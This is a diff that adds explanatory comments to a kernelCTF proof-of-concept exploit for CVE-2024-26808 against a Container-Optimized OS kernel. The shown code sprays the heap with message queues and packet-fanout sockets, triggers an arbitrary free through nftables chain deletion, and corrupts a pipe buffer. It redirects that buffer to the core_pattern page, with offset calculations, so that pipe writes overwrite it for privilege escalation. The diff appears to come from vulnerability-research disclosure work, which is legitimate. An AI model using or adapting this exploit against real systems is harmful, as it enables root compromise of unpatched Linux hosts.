More explain on exploit.c

pocs/linux/kernelctf/CVE-2024-26808_cos/exploit/cos-105-17412.294.36/exploit.c

@@ -510,7 +510,11 @@ int main(int argc, char **argv)
 		if (msqid[i] < 0)
 			printf("msgget01 Failed 0x%x\n", i);
 	}
-
+	// max_num_members == 0x1000 to make struct packet_fanout in kmalloc-4096 cache
+	// gef➤  p sizeof(struct packet_fanout) + sizeof(struct sock*)*0x100
+	// $4 = 0x8c0
+	// match = kvzalloc(struct_size(match, arr, args->max_num_members),
+	//			 GFP_KERNEL);
 	struct fanout_args fa = {.max_num_members = 0x100};
 	for (int i = 0; i < 0x100; i++)
 		p[i] = SYSCHK(socket(AF_PACKET, SOCK_RAW, 1));
@@ -667,7 +671,7 @@ int main(int argc, char **argv)
 	// perform arbitrary free (again)
 	del_chain(nl_nf, NFPROTO_INET, "test_netdev", chain_name);
 	sleep(1);
-	
+
 	//Write 0x1000 bytes to pipe A, it will increase `pipe->head` 
 	//doesn't touch to important field of `msg_msgseg.next` which located at the first eight bytes need to be null.
 	for (int i = 0; i < 0x40; i++)
@@ -707,7 +711,12 @@ int main(int argc, char **argv)
 			// $6 = (char (*)[128]) 0xffffffff8359e7a0 <core_pattern>
 			// gef➤  p 0xffffffff8359e000-0xffffffff82d3b000
 			// $7 = 0x863000
+			// the difference between the address of the pages of vdso_image_64.data and core_pattern is 0x863000
+			// every 4096 byte page, there is a 64 byte struct page* stored in vmemmap, 
+			// so to calculate the difference between struct page* addresses, you have to do: 0x863000 / 4096 * 64 which equals to 0x863000 >> 6
 			p->page += (0x863000 >> 6);
+			// core_pattern is 0xffffffff8359e7a0, so 0x7a0 is the offset within core_pattern's page.
+			// Since p->len == 1, we need to subtract one on p->offset
 			p->offset = 0x7a0 - 1;
 			p->flags = 0x10; // PIPE_BUF_FLAG_CAN_MERGE, apply every pipe write to the page
 			break;